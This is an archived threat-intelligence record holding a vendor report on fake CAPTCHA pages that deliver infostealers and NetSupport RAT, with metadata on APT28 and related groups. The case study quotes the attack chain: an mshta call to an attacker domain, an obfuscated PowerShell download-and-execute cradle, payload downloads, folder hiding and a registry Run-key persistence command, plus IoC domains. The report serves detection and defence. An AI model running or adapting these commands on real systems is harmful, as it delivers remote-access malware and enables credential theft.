{
	"id": "8cb012e6-60b1-481e-9006-cc82c4ce0c1a",
	"created_at": "2026-04-06T01:32:02.993581Z",
	"updated_at": "2026-04-10T03:37:50.802695Z",
	"deleted_at": null,
	"sha1_hash": "fca4ed26bcc97d90745302cc55950e9da2810ebb",
	"title": "Using CAPTCHA for Compromise: Hackers Flip the Script",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 726298,
	"plain_text": "Using CAPTCHA for Compromise: Hackers Flip the Script\r\nBy Alex Capraro 17 December 2024\r\nPublished: 2024-12-17 · Archived: 2026-04-06 00:09:59 UTC\r\nKey Points\r\nIn our investigations, we identified malware campaigns using fake CAPTCHA pages that mimic trusted\r\nservices like Google and CloudFlare.\r\nThese malicious CAPTCHAs silently copy commands to users’ clipboards, tricking them into execution\r\nvia the Windows Run prompt.\r\nInfections typically involve information stealers (infostealers) and remote-access trojans (RATs) that\r\nextract sensitive data and facilitate persistent access to compromised systems.\r\nAn increasing number of cybercriminals, including advanced threat actors like “APT28” (aka Fancy Bear),\r\nare successfully employing these deceptive tactics. This rapid proliferation underscores the need for timely\r\nand adaptive defensive measures.\r\nOrganizations should educate employees to recognize the risks of fake CAPTCHAs and implement\r\ndetection measures to block associated indicators of compromise (IoCs).\r\nCyber adversaries are constantly inventing new ways to outsmart defenses and exploit unsuspecting users. In early\r\nSeptember 2024, ReliaQuest identified multiple incidents in customer environments involving compromised\r\nwebsites impersonating CAPTCHA pages—those familiar online verification tools that ask you to prove you’re\r\nhuman—to spread malware. These attacks impersonate trusted CAPTCHA services like Google and CloudFlare,\r\nluring users into a false sense of security.\r\nFrom October to early December 2024, our customers observed nearly twice as many fake CAPTCHA websites\r\ncompared to September. 
This surge was likely the result of researchers releasing the templates used for these\r\ncampaigns, which inadvertently provided more threat actors with the tools to easily replicate these tactics.\r\nThese incidents often culminate in credential theft, giving attackers a crucial foothold for launching data breaches,\r\nhijacking accounts, or committing financial fraud. By exploiting users’ trust in CAPTCHA systems, this effective\r\nand deceptive tactic entices individuals into unknowingly bypassing standard security measures designed to\r\nprevent malicious file downloads.\r\nIn this report, we take you through the progression of a typical incident involving a fake CAPTCHA and detail the\r\ninformation-stealing malware (infostealers) and remote-access trojans (RATs) these campaigns distribute. To help\r\nyou strengthen your defensive measures and reduce the impact of similar attacks, we also examine a real-world\r\nhttps://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nPage 1 of 11\n\ncase study, how the fake CAPTCHA method might evolve, and how ReliaQuest’s automated response tools\r\nminimize its consequences.\r\nCAPTCHA Trickery: How Do Incidents Usually Play Out?\r\nThe attack chain is deceptively simple. It uses familiar CAPTCHA interfaces to execute scripts, which makes it\r\nhighly effective because of its seemingly benign nature. The incidents we investigated typically followed the\r\nsequence below:\r\n1. Malicious Redirect: A web user visits a compromised website and is redirected to another webpage, where\r\nthey’re presented with a familiar and seemingly harmless CAPTCHA challenge (see Figure 1).\r\n2. JavaScript Clipboard Hijack: Simply by visiting the website, a malicious command is silently copied to the\r\nuser’s clipboard via JavaScript, without their knowledge.\r\n3. 
Unusual Run Prompt: Instead of clicking how many traffic lights or bridges they see, the user is instructed to\r\nopen a Run prompt—a Windows feature for quickly executing commands, opening programs, and accessing files\r\n—and paste the pre-copied command, unknowingly running the malicious script.\r\n4. Malware Installation: The command leads to the installation of malware, often resulting in credential theft, as\r\nlogin details for systems, applications, and services are harvested and sent to attackers.\r\nFigure 1: Example of a fake CAPTCHA with the payload in the Run box\r\nImpersonating CloudFlare: A Step-by-Step Look at the Attack\r\nThe approach taken by the threat actor in this case study is particularly innovative. The actor leveraged a\r\nmalicious website that impersonated CloudFlare, a widely used distributed denial of service (DDoS) protection\r\nplatform, to enhance the attack’s credibility.\r\nInitial Infection\r\nIn October 2024, a retail trade customer encountered a fake CAPTCHA (see Figure 2) hosted at\r\ninspyrehomedesign[.]com after being redirected from retailtouchpoints[.]com.\r\nFigure 2: Fake Cloudflare CAPTCHA with the alerting command highlighted\r\nTypical of deceptive CAPTCHAs, it instructed the user to perform a copy-and-paste action in the Windows Run\r\nfeature. 
Completing this fake CAPTCHA resulted in the execution of the following command:\r\n\"C:\\WINDOWS\\system32\\mshta.exe\" hxxps://inspyrehomedesign[.]com/Ray-verify.html # ✅ ''Verify you\r\nare human - Ray Verification ID: 6450''\r\nIn this command, the “Verify you are human” text comes after the malicious command, cleverly concealing the\r\nharmful instructions once pasted into the Windows Run box (see Figure 2).\r\nThe command uses the MSHTA.exe binary to download the file “Ray-verify[.]html.” Notably, the use of the\r\nMSHTA.exe Windows utility allows for the discreet download of the next stage of the infection. The HTML\r\ndocument contains PowerShell commands that execute the subsequent payload(s).\r\nSecondary Script Execution\r\nThe second stage of the attack began with the execution of a PowerShell script, which concealed an additional\r\nPowerShell script within a file named “o.png.” This obfuscation was designed to evade detection. The script was\r\ndownloaded from the domain “traversecityspringbreak[.]com” using the command:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" $c1='(New-ObjectNet.We';$c4='bClient).Downlo';\r\n$c3='adString(''hxxps://traversecityspringbreak[.]com/o/o.png'')'; $TC=I E X ($c1,$c4,$c3 -Join '')\r\nI E X\r\nThis subsequent command embedded within the “o.png” script then cleared the DNS cache via the command\r\nbelow, likely to hide any evidence of the actor’s malicious activity.\r\nipconfig /flushdns\r\nTo create a concealed directory, a random directory name was generated and created in the user’s AppData folder\r\nusing the command (pipe characters restored where the extraction dropped them):\r\n$randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | % {[char]$_})\r\nNew-Item -ItemType Directory -Path $randomFolderPath\r\nThis led to the following path being created:\r\nC:\\Users\\CURRENTUSER\\AppData\\Roaming\\geWGID\r\nDownloading and Hiding Malicious 
Components\r\nNext, 12 more files were downloaded from traversecityspringbreak[.]com using the command:\r\nInvoke-WebRequest hxxps://traversecityspringbreak[.]com/o/[n].png -OutFile\r\nC:\\Users\\CURRENTUSER\\AppData\\Roaming\\geWGID[filename]\r\nThe files included “client32.ini” (a configuration file) and “client32.exe” (the main file for NetSupport RAT). The\r\nthreat actor hid the directory to conceal the installation of these 12 files from the user via the command:\r\ncmd /c attrib +h C:\\Users\\CURRENTUSER\\AppData\\Roaming\\geWGID\r\nEstablishing Persistence and Running the RAT\r\nA “Run Key” was added to the registry using the following command to ensure the RAT is executed at every\r\nstartup:\r\nNew-ItemProperty -Path HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -Name Microsoft -\r\nValue C:\\Users\\CURRENTUSER\\AppData\\Roaming\\geWGID\\client32.exe\r\nFinally, the adversary launched the RAT using the command:\r\nStart-Process C:\\CURRENTUSER\\admin\\AppData\\Roaming\\geWGID\\client32.exe\r\nHow did ReliaQuest Respond?\r\nA ReliaQuest GreyMatter alert fired because of suspicious PowerShell execution in the initial command line of\r\nthis attack.\r\nOur investigation into the suspicious activity revealed that the indicators of compromise (IoCs), including\r\nclient32.exe and client32.ini, were consistent with the installation of NetSupport RAT—a malicious remote-access\r\ntool known for targeting various sectors to facilitate data theft, espionage, and network control.\r\nReliaQuest isolated the affected host using GreyMatter Response Playbooks, revoked the user’s session, reset their\r\npassword, and blocked the identified IoCs using GreyMatter Respond.\r\nThe key takeaway from this case study is the urgent need to educate employees about new and evolving\r\nmanipulation techniques. 
This knowledge will empower them to recognize suspicious activities, such as websites\r\nthat prompt users to run commands. Additionally, companies should implement network controls to block access\r\nto newly registered and compromised websites, further fortifying defenses against such threats.\r\nTo prevent similar incidents, targeted user training is crucial. Focus on helping your teams recognize the signs of\r\nmalicious activity, such as unexpected requests to run commands or download (potentially malicious) updates\r\nfrom unverified sources. Encourage them to be vigilant in verifying URL authenticity to thwart infection attempts.\r\nTraining should also cover identifying unusual behavior in familiar interfaces, like CAPTCHAs asking for non-standard actions. By providing clear examples, employees will be able to effectively spot these threats early.\r\nAdditionally, emphasize the importance of immediately reporting suspicious activities to enable rapid responses\r\nand mitigation actions, such as blocking malicious domains.\r\nActive since at least 2017, “NetSupport RAT” uses the NetSupport Manager tool, which is known for\r\nsurveillance capabilities like keystroke logging, screen capturing, and webcam access.\r\nNetSupport RAT spreads primarily through phishing, drive-by downloads, and exploiting vulnerabilities like\r\nCVE-2023-36025—a Windows SmartScreen bypass vulnerability.\r\nA NetSupport RAT infection can lead to catastrophic breaches, giving attackers control over your system,\r\nenabling extensive data theft, unauthorized surveillance, and potentially facilitating lateral movement and\r\ndisruption in your network.\r\nShifting Threat Landscape in CAPTCHA Exploitation\r\nInnovative Strategies in User Manipulation\r\nThis is not the first time we’ve seen threat actors using individuals’ clipboards to trick them into executing\r\nmalicious commands. 
In May 2024, we found that the JavaScript framework “ClearFake” had been using a similar\r\ncampaign to drop infostealers.\r\nInstead of a CAPTCHA, compromised websites displayed a prompt indicating content could not be shown\r\nproperly (see Figure 3) and instructed users to install a root certificate by clicking a “Fix it” button.\r\nFigure 3: Example of a “ClickFix/ClearFake” campaign pop-up message\r\nThis action copied obfuscated malicious PowerShell code to the users’ clipboards. Users were then guided to open\r\na PowerShell terminal and paste in the code, which was then executed.\r\nThe ClearFake campaign is a less polished precursor to the new fake CAPTCHA tactics.\r\nThe root certificate approach relies heavily on user compliance, requiring steps like manually copying commands\r\nto the user’s clipboard and opening a PowerShell terminal—actions likely to raise suspicion among more cautious\r\nusers.\r\nIn contrast, the new fake CAPTCHA method simplifies the process by presenting a familiar and trusted\r\nCAPTCHA interface with fewer steps to follow, which reduces user hesitation.\r\nThis effective, streamlined method has, in turn, led to various modifications and improvements, including:\r\nNew Fake CAPTCHA Templates: Innovative templates mimicking CloudFlare and Google Meet pages\r\nhave been created. 
By continually developing new landing pages to deliver the fake CAPTCHAs, attackers\r\ncan target a broader range of potential victims.\r\nBypassing User Verification: The method now skips the “verify” click step to access instructions,\r\nencouraging users to complete the copy-paste instructions more mindlessly, reducing their chance to\r\nscrutinize the actions.\r\nClipboard Clearing: After executing the payload command, the clipboard is cleared to hide the malicious\r\nactivity, making detection more difficult.\r\nThe clear evolution of user manipulation tactics highlights how quickly threat actors can make improvements to\r\nexisting campaigns for greater impact. These advancements demonstrate not only the adaptability of\r\ncybercriminals but also the growing sophistication of their methods. As threat actors refine their techniques, they\r\ncan exploit user trust more effectively, bypass security measures with greater ease, and widen their reach to target\r\nmore individuals.\r\nCAPTCHA Me If You Can: Top Threats\r\nWe looked into customer incidents involving the new fake CAPTCHA campaign to find the most prevalent\r\nmalware families found in these infections between October and early December 2024:\r\n1. “Lumma Stealer” (aka LummaC2, Lumma)\r\n2. “StealC”\r\n3. NetSupport RAT (aka Netsupport)\r\n4. “Amadey”\r\nFigure 4: BreachForums user recommending Lumma Stealer\r\nRATs like NetSupport grant attackers persistent access to compromised systems, enabling continuous surveillance,\r\ndata theft, and lateral movement within networks. This means attackers can monitor activities, intercept sensitive\r\ncommunications, and potentially access other connected systems, amplifying the impact of a breach.\r\nInfostealers from campaigns like Lumma and StealC can exfiltrate sensitive data, including login credentials,\r\nfinancial information, and personally identifiable information (PII). 
This stolen data is often sold on underground\r\nmarkets, leading to identity theft, financial fraud, and initial access into enterprise networks. The financial and\r\nreputational damage from such compromises can be significant, affecting customer trust and resulting in\r\nregulatory penalties.\r\nThreat actors on cybercriminal forums frequently seek recommendations for the most effective tools. The\r\nwidespread adoption of Lumma Stealer is likely influenced by endorsements from high-reputation forum users\r\nwho have found the tool effective and advocate its use to others. As shown in the screenshot (see Figure 4), a\r\nprominent BreachForums user specifically recommends Lumma Stealer to another forum user.\r\nHigh-Level Hackers Turn to Basic CAPTCHA Tactics\r\nBoth regular cybercriminals and sophisticated groups like APT28, linked to the Russian military, are trying their\r\nhand at these tactics. A recent investigation by the Computer Emergency Response Team of Ukraine (CERT-UA)\r\nrevealed APT28 had been using fake CAPTCHA systems to infiltrate local governments. By mimicking\r\nreCAPTCHA interfaces, they tricked users into executing commands that downloaded harmful scripts. These\r\nscripts are capable of establishing Secure Shell (SSH) tunnels and exfiltrating data, highlighting the attack’s\r\nsimplicity and potency.\r\nThis is significant because, traditionally, effective hacking methods are first developed by skilled groups and\r\neventually trickle down to less experienced hackers. 
However, in this case, even advanced groups are adopting\r\ntactics typically used by common cybercriminals, underscoring the surprising effectiveness of these fake\r\nCAPTCHA strategies.\r\nWhat ReliaQuest is Doing\r\nReliaQuest is actively monitoring these evolving campaigns, with a keen focus on shifts in delivery mechanisms.\r\nAlthough fake CAPTCHAs are a new technique, the underlying method relies on encoded PowerShell commands\r\nor Living off the Land binaries (LOLBins) like MSHTA.exe. As such, we can detect this activity using pre-established detection rules to identify common malware delivery techniques.\r\nGreyMatter Respond and Automated Response Playbooks\r\nFor the fastest remediation against threats like NetSupport RAT, organizations should implement automated\r\nresponse actions. Enabling GreyMatter’s Automated Response Playbooks allows for automatic threat containment,\r\nreducing the mean time to contain a threat, or MTTC, and halting the adversary’s progress. Alternatively,\r\norganizations can opt for the “RQ Approved” setting to allow our analyst team to handle remediation actions. This\r\napproach speeds up containment while requiring a ReliaQuest analyst’s discretion when executing a Response\r\nPlaybook.\r\nTo most effectively contain and mitigate threats from NetSupport RAT, enabling and automating the Isolate Host\r\nresponse playbook is crucial—after ensuring that legitimate user activities and critical business processes won’t be\r\ndisrupted. This action severs all connections to the attacker’s command-and-control (C2) infrastructure,\r\npreventing further execution of malicious commands or downloads.\r\nIf isolating the host isn’t feasible, for instance when dealing with critical business assets, we recommend manually\r\nexecuting the Block IP, Block Domain, and Block URL playbooks on identified attacker infrastructure. 
These\r\nactions prevent hosts from downloading additional malware and stop them from reconnecting to the C2\r\ninfrastructure.\r\nGiven that most malware, including infostealers, targets sensitive information, it’s always best to err on the side of\r\ncaution and assume that a user’s credentials may be compromised. Activating the Terminate Active Sessions and\r\nReset Password playbooks ensures that any hijacked sessions are ended and compromised credentials are\r\nchanged, thereby preventing further unauthorized access.\r\nAdditionally, running the Delete File and Block Hash playbooks removes identified malicious files and blocks\r\ntheir execution on other hosts. This limits the threat actor’s ability to move laterally and prevents additional\r\ncompromises.\r\nOrganizations using ReliaQuest’s Automated Response Playbooks have reduced their MTTC to an average of just\r\nfive minutes for relevant alerts, compared to five hours or longer when relying on manual response strategies.\r\nThese playbooks are proven to effectively mitigate threats and minimize operational disruptions, allowing\r\norganizations to contain threats quickly and maintain operational continuity.\r\nFortify Your Security Posture By:\r\nConducting Employee Training and Awareness: Conduct regular training sessions to educate employees\r\nabout the risks associated with fake CAPTCHAs. Though this may sound generic, an informed workforce\r\nis a critical defense against social engineering attacks. Training should cover how to spot suspicious\r\nCAPTCHAs, such as recognizing when websites are instructing users to run commands.\r\nDisabling Password Saving in Browsers: Implement strict network policies or Group Policy Objects\r\n(GPOs) to prevent web browsers from saving passwords. This critical security measure helps protect\r\nagainst infostealers that target stored credentials to exfiltrate sensitive information. 
Conduct regular audits\r\nto ensure compliance and effectiveness. Alternatively, consider deploying an organization-wide password\r\nmanager, offering users convenience while enhancing security.\r\nDeploying Constrained Language Mode: This mode restricts PowerShell’s scripting environment to a\r\nsafer subset of its functionality, limiting access to potentially dangerous operations. It prevents the use of\r\ncertain language elements and object types that attackers could exploit. By doing so, Constrained Language\r\nMode reduces the attack surface, making it harder for malicious scripts to execute harmful actions, evade\r\ndetection, or escalate privileges.\r\nConclusion\r\nIn this report, we’ve highlighted the urgent need for robust cybersecurity measures in the face of evolving\r\nCAPTCHA techniques used by both everyday cybercriminals and advanced groups like APT28. Automated\r\nincident response measures not only accelerate remediation efforts but also allow for analyst oversight when\r\nneeded. By implementing GreyMatter Automated Response Playbooks, organizations can swiftly and effectively\r\ncontain these threats, significantly reducing MTTC and ensuring operational continuity.\r\nLooking ahead, we predict with high confidence that threat actors will continue to innovate and refine their\r\nCAPTCHA-targeting campaigns, making them even more elusive. Within the next three months, we anticipate\r\nenhancements in the fake CAPTCHA infection vector, such as employing alternative execution methods that do\r\nnot use PowerShell commands. This could involve using other LOLBins like forfiles.exe or certutil.exe to\r\ndownload the initial stage, aiming to circumvent existing detection measures.\r\nThis evolution presents a significant risk and highlights the importance of a defense-in-depth strategy that layers\r\nmultiple security measures to effectively counter these advancing threats. 
By adopting this approach, you can\r\nharden your defenses, mitigate similar threats, and maintain a resilient security posture.\r\nIoCs\r\nWe have incorporated these IoCs into our GreyMatter Intel feed for ReliaQuest customers. Our investigations\r\nfound that these domains hosted fake CAPTCHA infrastructure in various incidents.\r\nholidaybunch[.]com\r\nforthedoglover[.]com\r\ntraversecityspringbreak[.]com\r\ninspyrehomedesign[.]com\r\nretailtouchpoints[.]com\r\nwebdemo[.]biz\r\nthecopycat[.]biz\r\nSource: https://www.reliaquest.com/blog/using-captcha-for-compromise/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.reliaquest.com/blog/using-captcha-for-compromise/"
	],
	"report_names": [
		"using-captcha-for-compromise"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439122,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fca4ed26bcc97d90745302cc55950e9da2810ebb.pdf",
		"text": "https://archive.orkl.eu/fca4ed26bcc97d90745302cc55950e9da2810ebb.txt",
		"img": "https://archive.orkl.eu/fca4ed26bcc97d90745302cc55950e9da2810ebb.jpg"
	}
}